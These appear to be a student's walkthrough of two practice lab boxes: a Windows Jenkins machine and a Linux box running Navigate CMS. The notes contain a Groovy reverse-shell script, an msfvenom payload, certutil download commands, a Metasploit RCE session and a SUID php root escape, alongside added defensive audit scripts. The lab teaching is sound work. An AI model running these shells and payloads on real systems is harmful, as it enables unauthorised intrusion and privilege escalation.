j_username=§admin§&j_password=§password§&from=&Submit=Sign+in
We can access /script now that we are in the dashboard.
- Open a listener on your Kali machine: nc -lvnp 4444
- Run the following script in the script console (or use this tutorial):
String host="192.168.92.128";
int port=4444;
Process p=new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e){}
};
p.destroy();
s.close();
systeminfo
10.0.19043
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB5020872
[02]: KB5000736
[03]: KB5021233
[04]: KB5020372
[05]: KB5001405
- Download winpeas64.exe on your Kali machine into a transfer folder (https://github.com/peass-ng/PEASS-ng/releases/latest).
- Inside this folder, start a web server with python3 -m http.server 80
- On the Windows machine, navigate to c:\Users\butler; WiseCare365_5.6.7.568.exe is in Downloads. Use dir to see what's inside.
- Run certutil.exe -urlcache -f http://192.168.92.128/winpeas.exe winpeas.exe
- Run winpeas.exe: lots of enumeration, but something interesting with Wise Care 365 (no quotes and a space detected, i.e. an unquoted service path: explanation).
- On your Kali machine, prepare the malware:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.92.128 LPORT=7777 -f exe > Wise.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
- Relaunch your Python server.
- Go to c:\Program Files (x86)\Wise, then run certutil -urlcache -f http://192.168.92.128/Wise.exe Wise.exe
whoami
nt authority\system
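The unquoted service path WinPEAS flagged, as an added audit helper (my example, not from the course or from WinPEAS): it reproduces the order in which Windows tries candidate programs for an unquoted ImagePath, which is why a Wise.exe in c:\Program Files (x86)\Wise gets picked up, and lists the directories whose ACLs an administrator must keep non-writable. The ImagePath value is constructed, since the notes do not show the real registry entry.

```python
import ntpath

# Constructed ImagePath for the vulnerable service (the notes do not show the real registry value).
SAMPLE_IMAGE_PATH = r"C:\Program Files (x86)\Wise\Wise Care 365\example_service.exe"

def service_executable(image_path):
    """Return (executable_part, was_quoted) for a service ImagePath."""
    # A quoted path is taken literally; unquoted: up to and including the first '.exe' is
    # the program, the rest arguments; with no '.exe' the whole string counts as the program.
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end != -1 else p[1:]), True
    idx = p.lower().find(".exe")
    return (p[: idx + 4] if idx != -1 else p), False

def is_unquoted_vulnerable(image_path):
    """True when the path is unquoted and its executable part contains a space."""
    exe, quoted = service_executable(image_path)
    return not quoted and " " in exe

def hijack_candidates(image_path):
    """Programs CreateProcess tries, in order, before reaching the intended executable."""
    # At every space the prefix is tried; a prefix with no extension gets '.exe' appended,
    # which is how "...\Wise\Wise Care 365\svc.exe" yields "...\Wise\Wise.exe" on the way.
    exe, quoted = service_executable(image_path)
    if quoted:
        return [exe]
    candidates = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            if not ntpath.splitext(prefix)[1]:
                prefix += ".exe"
            candidates.append(prefix)
    candidates.append(exe)
    return candidates

def directories_to_review(image_path):
    """Parents of the hijack candidates: if non-admins can write there, the service is a privesc."""
    return sorted({ntpath.dirname(c) for c in hijack_candidates(image_path)[:-1]})

if __name__ == "__main__":
    print("vulnerable:", is_unquoted_vulnerable(SAMPLE_IMAGE_PATH))
    for c in hijack_candidates(SAMPLE_IMAGE_PATH):
        print("  tries:", c)
    print("review ACLs on:", directories_to_review(SAMPLE_IMAGE_PATH))
```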
1 GB of memory is enough, NAT for the network.
- Log in with root:tcm.
- Run dhclient, then ip a
nmap -T4 -p- -A 192.168.92.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-26 06:57 EDT
Nmap scan report for 192.168.92.137
Host is up (0.00082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)
| 256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)
|_ 256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u5-Debian
80/tcp open http nginx 1.14.2
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.14.2
MAC Address: 00:0C:29:CC:65:D4 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms 192.168.92.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.44 seconds
Notes
Linux (Kernel versions 4.15 to 5.8)
Port 22/tcp (SSH) OpenSSH 7.9p1 (Debian 10+deb10u2)
Port 53/tcp (DNS) ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
Port 80/tcp (HTTP) nginx/1.14.2, Webmaster: [email protected]
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.137/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.137/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 5ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 1ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 5ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 2ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 6ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 4ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 1ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 4ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 11ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 5ms]
# on atleast 2 different hosts [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 8ms]
[Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 7ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 9ms]
# Copyright 2007 James Fisher [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 10ms]
secret [Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 5ms]
[Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 7ms]
:: Progress: [220560/220560] :: Job [1/1] :: 4761 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
/secret
OMG you got r00t !
Just kidding... search somewhere else. Directory busting won't give anything.
<This message is here so that you don't waste more time directory busting this particular website.>
- Alek
dnsrecon -r 127.0.0.0/24 -n 192.168.92.137 -d blah
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] PTR blackpearl.tcm 127.0.0.1
[+] 1 Records Found
nano /etc/hosts and add 192.168.92.137 blackpearl.tcm
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blackpearl.tcm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 8ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 13ms]
# [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 16ms]
# [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 23ms]
# on atleast 2 different hosts [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 32ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 35ms]
# Copyright 2007 James Fisher [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 43ms]
[Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 47ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 52ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 62ms]
# [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 75ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 92ms]
# [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 94ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 89ms]
navigate [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 6ms]
[Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 15ms]
:: Progress: [220560/220560] :: Job [1/1] :: 6060 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
Notes
PHP info page, Linux blackpearl 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64, php/7.3/
/navigate login page, Navigate CMS v2.8
https://www.rapid7.com/db/modules/exploit/multi/http/navigate_cms_rce/
- Run msfconsole, then:
use exploit/multi/http/navigate_cms_rce
set rhosts 192.168.92.137
set vhost blackpearl.tcm
- Run exploit:
[*] Started reverse TCP handler on 192.168.92.128:4444
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (39927 bytes) to 192.168.92.137
[*] Meterpreter session 1 opened (192.168.92.128:4444 -> 192.168.92.137:50606) at 2024-07-26 08:04:04 -0400
meterpreter > shell
Process 833 created.
Channel 1 created.
whoami
www-data
which python
/usr/bin/python
- Paste python -c 'import pty; pty.spawn("/bin/bash")' in the shell.
- sudo -l: we don't have sudo privileges.
- cd /tmp to work from a temp folder and download linpeas.
- Download linpeas: wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh and chmod +x linpeas.sh
- Run ./linpeas.sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 4.6M Feb 13 2021 /usr/bin/php7.3 (Unknown SUID binary!)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
- SUID: rwsr in the mode means the file runs as its owner (root); SGID likewise runs it as the group. Another way to get the list:
find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/php7.3
/usr/bin/su
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
- go through the list with https://gtfobins.github.io/#+suid, and look for a solution
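An added audit (my example, not from the course or from linpeas) that reads the linpeas lines above, decodes the s bit from the mode string the way the note describes, and flags root-owned setuid files outside an expected baseline. The baseline is assumed: it is the page's own list with php7.3 left out, since an interpreter should never be setuid. find_suid() is the stat-based equivalent of the find command.

```python
import os
import re
import stat

# Sample input: four of the SUID lines from the linpeas output above (constructed subset).
LINPEAS_SUID_LINES = """\
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 4.6M Feb 13 2021 /usr/bin/php7.3 (Unknown SUID binary!)
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)
"""

EXPECTED_SUID = {  # assumed baseline: the page's list minus php7.3 (stock Debian 10 set)
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/su", "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/gpasswd",
}

# mode, link count, owner, group, size, month, day, year, path; trailing linpeas notes are ignored
LINE_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)"
)

def parse_mode(mode):
    """(setuid, setgid) from a 10-char ls mode: 's' at index 3 (owner exec) / index 6 (group exec)."""
    if len(mode) != 10:
        raise ValueError("expected a 10-character mode string, got %r" % mode)
    return mode[3] in "sS", mode[6] in "sS"

def parse_listing(text):
    """Yield (path, owner, group, setuid, setgid) for every ls -l style line in text."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            setuid, setgid = parse_mode(m["mode"])
            yield m["path"], m["owner"], m["group"], setuid, setgid

def unexpected_root_suid(text, baseline=EXPECTED_SUID):
    """Root-owned setuid files outside the baseline: investigate these (or strip the bit) first."""
    return sorted(path for path, owner, _g, setuid, _s in parse_listing(text)
                  if setuid and owner == "root" and path not in baseline)

def find_suid(root="/"):
    """Live equivalent of `find / -perm -4000 -type f 2>/dev/null`, using stat bits instead of ls text."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                mode = os.lstat(full).st_mode
            except OSError:
                continue
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.append(full)
    return hits
```

Running unexpected_root_suid() on the full linpeas block above flags only /usr/bin/php7.3, the binary the walkthrough goes on to use.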
- We decide to use:
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
Good job on this one.
Finding the domain name may have been a little guessy,
but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.
- You can also cat /etc/shadow and cat /etc/passwd.
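Virtual host routing, the lesson the flag text mentions, as an added stand-alone Python demo (my example, not the box's nginx configuration): one listener on one IP answers with a different site depending only on the Host header, which is why the /etc/hosts entry for blackpearl.tcm changes what the browser receives from 192.168.92.137. The vhost table and both page bodies are constructed.

```python
import http.client
import socketserver
import threading
from http.server import BaseHTTPRequestHandler

# Constructed vhost table standing in for the box's nginx server blocks (assumed, not the real config).
VHOSTS = {
    "blackpearl.tcm": b"<html><body>Navigate CMS login</body></html>",
}
# What the default site answers when the request carries only the IP in its Host header.
DEFAULT_SITE = b"OMG you got r00t !\nJust kidding... search somewhere else.\n"

class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Routing key: the Host header with any :port stripped, compared case-insensitively.
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = VHOSTS.get(host, DEFAULT_SITE)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_args):
        pass  # keep the demo output quiet

def start_server():
    """One listener on 127.0.0.1 and an ephemeral port, playing the role of 192.168.92.137:80."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def fetch(port, host_header):
    """Same IP and port every time; only the Host header differs, exactly what /etc/hosts changes."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    body = conn.getresponse().read()
    conn.close()
    return body

def demo(host_headers=("192.168.92.137", "blackpearl.tcm", "BLACKPEARL.TCM:80")):
    """Start the server, request / once per Host header, return {host_header: body}."""
    srv = start_server()
    try:
        return {h: fetch(srv.server_address[1], h) for h in host_headers}
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    for host, body in demo().items():
        print(f"Host: {host!r:22} -> {body.decode().splitlines()[0]}")
```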